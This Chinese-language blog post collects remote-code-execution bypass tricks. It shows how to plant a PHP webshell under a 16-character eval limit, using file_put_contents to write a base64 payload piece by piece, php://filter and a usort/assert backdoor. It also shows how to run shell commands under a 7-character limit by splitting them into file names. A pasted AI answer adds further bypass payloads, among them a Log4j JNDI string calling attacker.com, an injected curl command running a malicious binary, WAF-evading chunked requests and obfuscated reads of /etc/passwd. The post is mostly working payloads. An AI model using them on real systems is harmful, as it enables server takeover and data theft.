rce 绕过技巧小总结

目录

1.eval长度限制突破

php eval函数参数限制在16个字符的情况下,如何拿到webshell

技巧1:`$_GET[1]`

技巧2: include$_GET[1]

技巧3:file_put_contents

技巧4:usort(...$_GET)

2.命令长度限制突破技巧

Linux命令长度限制在7个字符的情况下,如何拿到shell

技巧1:临时文件的匹配 


1.eval长度限制突破

php eval函数参数限制在16个字符的情况下,如何拿到webshell

<?php
$param = $_REQUEST['param'];
if (
strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false
) {
eval($param);
}

这段代码不仅参数长度限制,并且还过滤了eval和assert两个函数,我们的第一想法肯定是params=$_POST[123]

但是好像有问题。下面给出几个技巧

技巧1:`$_GET[1]`

技巧2: include$_GET[1]

这个需要我们提前写入一个phpinfo的文件,利用脚本不停post上传垃圾数据大文件,让它生成临时文件,找到临时文件的位置,在1的位置输入临时文件的位置,然后include文件包含

技巧3:file_put_contents

rce.php?1=file_put_contents&param=$_GET[1](N,P,8);

rce.php?1=file_put_contents&param=$_GET[1](N,D,8);

.......

rce.php?1=file_put_contents&param=$_GET[1](N,w,8);

/* 'PD9waHAgZXZhbCgkX1BPU1RbOV0pOw' */

rce.php?param=include$_GET[1];&1=php://filter/read=convert.b ase64-decode/resource=N

当我们执行rce.php?1=file_put_contents&param=$_GET[1](N,P,8);时他就会生成一个内容为P,文件名为N的文件 

因为长度的限制,所以我们的目的就是将<?php eval($_POST[9]);的base64编码的值PD9waHAgZXZhbCgkX1BPU1RbOV0pOw一个一个的这样写入文件N中去,再用php://filter伪协议将N解码执行。最后我们抓包改包不就可以了吗?

问题又来了?我们为什么不能直接传入未编码的值呢?

因为file_put_contents不允许写入<

技巧4:usort(...$_GET)

php5.6+变长参数=>usort回调后门=>任意代码执行

param=usort(...$_GET);

rce.php?1[]=test&1[]=phpinfo();&2=assert

2.命令长度限制突破技巧

Linux命令长度限制在7个字符的情况下,如何拿到shell

<?php
$param = $_REQUEST['param'];
if ( strlen($param) < 8 ) 
{ 
    echo shell_exec($param);
}

技巧1:临时文件的匹配 

完成这个问题,很简单。我们需要先写一个文件,文件里面有我们的想要执行的命令,上传时生成临时文件。利用php临时文件的匹配param= . /t*/*。然后shell_exec执行我们文件里的命令

技巧2:拆分

>hp
>c.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0
>重定向依次创建文件
文件列表以[换行符]分割每个文件
引入 `\` 转义ls时的换行,linux中,执行命令时,可以在没有写完的命令后面加\,实现一条命令多行化,以行末没有\为止
然后ls -t 以创建时间来列出当前目录下所有文件 ,写入0文件里
sh 0执行0文件里的命令

<think>嗯,用户想了解RCE漏洞绕过的方法和关键技术点。首先,我需要回忆一下RCE的基本概念。RCE是远程代码执行,攻击者能够在目标系统上执行任意代码,危害极大。用户提到的绕过可能是指绕过现有的防御措施,比如WAF、输入过滤或者沙箱环境。 首先,我得考虑常见的绕过技术。比如,命令注入中的特殊字符绕过,像分号、管道符、反引号这些。有时候,黑名单过滤不完善,可以用编码或替换字符的方式绕过。比如,用十六进制编码或者Base64编码命令,然后解码执行。 然后,用户提供的引用里有提到CVE-2024-0012,是关于身份认证绕过导致RCE的案例。这可能涉及权限提升或认证机制中的漏洞,比如利用会话管理的问题或者Cookie篡改。另外,引用3提到Log4j漏洞,涉及JNDI注入,这类漏洞利用特定的协议或服务来触发,绕过检测可能需要混淆payload,比如使用非常规的协议格式或拆分攻击字符串。 还需要考虑上下文,比如输入验证的漏洞。如果应用对用户输入处理不当,未正确转义或过滤,攻击者可能通过构造特殊输入注入恶意代码。例如,在SQL注入中,使用注释符或大小写混合绕过,类似的方法可能适用于RCE绕过。 另外,环境变量注入也是一种可能。比如,通过控制环境变量参数来执行命令,某些程序可能会信任特定的环境变量,从而导致代码执行。还有,利用动态代码执行函数,如PHP的eval,Python的exec,如果用户输入直接传递给这些函数,没有严格过滤,就会导致RCE。 还有,框架或库的漏洞,比如旧版本的库存在已知漏洞,攻击者可以利用这些未修补的漏洞执行代码。例如,Apache Struts的漏洞曾被广泛利用。 现在要结合用户提供的引用,引用1提到代码审计和静态分析,所以在绕过时可能需要找到代码审计中的疏漏,比如未覆盖的边缘情况。引用2中的认证绕过导致RCE,说明权限提升或绕过认证步骤是关键。引用3中的Log4j漏洞检测被WAF拦截,所以绕过WAF可能需要混淆技术。 总结下来,RCE绕过的方法可能包括:命令注入绕过过滤、利用编码或混淆、认证/授权绕过、框架漏洞利用、上下文敏感攻击(如模板注入)、以及利用信任机制漏洞。 需要确保回答结构清晰,分点说明,每个技术点给出例子,并引用提供的资料。比如,在认证绕过部分引用CVE-2024-0012的例子,在Log4j部分提到引用3的检测方法。 还要注意用户要求使用中文,LaTeX格式的数学表达式,但这个问题可能不太涉及数学公式,所以可能不需要太多数学内容。但如果有涉及变量或代码部分,需要用行内格式,比如$command$。 最后生成相关问题,要围绕RCE绕过的扩展,比如防御措施、特定漏洞分析、检测技术等。</think>### RCE漏洞绕过方法及关键技术点分析 #### 一、常见RCE漏洞绕过方法 1. **命令注入绕过** - **特殊字符替换**:利用黑名单未覆盖的符号(如`$()`、`%0a`、反引号)拼接命令,例如: ```bash # 原始命令:cat /etc/passwd # 绕过形式:c'a't /et$@c/pass''wd ``` - **编码转换**:使用Base64、十六进制或URL编码混淆命令,例如: ```bash echo "bHM=" | base64 -d | sh # 解码后执行"ls" ``` 2. **输入过滤绕过** - **多级嵌套解析**:利用应用层协议(如HTTP参数污染、JSON/XML解析差异)注入恶意代码[^3]。 - **上下文敏感攻击**:在模板注入(SSTI)中,通过构造`${"".getClass().forName("...")}`绕过沙箱限制。 3. **认证/授权绕过** - **会话伪造**:通过Cookie篡改或JWT令牌伪造绕过身份验证(如CVE-2024-0012中的Web界面认证绕过)[^2]。 - **路径遍历**:利用未校验的路径参数访问敏感接口,例如`/admin/../api/exec?cmd=id`。 4. **框架/库漏洞利用** - **动态加载漏洞**:如Log4j的JNDI注入(`${jndi:ldap://attacker.com/exp}`),通过DNS查询混淆绕过WAF检测。 - **反序列化漏洞**:利用Java/Python的反序列化机制触发恶意代码,例如Apache Commons Collections的Gadget链。 #### 二、关键技术点 1. **漏洞链组合** 通过多个漏洞串联实现绕过,例如: - 先绕过认证(CVE-2024-0012)→ 再利用权限提升漏洞(CVE-2024-9474)→ 最终执行任意命令[^2]。 $$ \text{RCE} = \text{认证绕过} \oplus \text{权限提升} \oplus \text{命令执行} $$ 2. **环境依赖利用** 利用目标系统环境变量或依赖库的缺陷,例如: ```bash # 注入环境变量实现命令执行 curl http://target.com/api?input=;export PATH=/tmp:$PATH;malicious-bin ``` 3. **混淆与逃逸技术** - **WAF绕过**:通过分块传输、注释插入或Unicode编码绕过正则匹配,例如: ```http POST /api HTTP/1.1 Transfer-Encoding: chunked 3; x=x\r\ncmd\r\n0\r\n\r\n ``` - **代码混淆**:在PHP中使用`${_GET['a']}`动态调用函数,避免直接出现敏感关键词。 #### 三、防御建议 1. **输入严格校验**:使用白名单机制限制字符集,例如仅允许`[a-zA-Z0-9_]`。 2. **沙箱隔离**:对动态代码执行操作进行资源隔离(如Docker容器)。 3. **依赖库更新**:定期升级框架/库版本(如Log4j升级到2.17.0+)。 4. **纵深防御**:结合WAF、RASP(运行时应用自保护)和代码审计[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值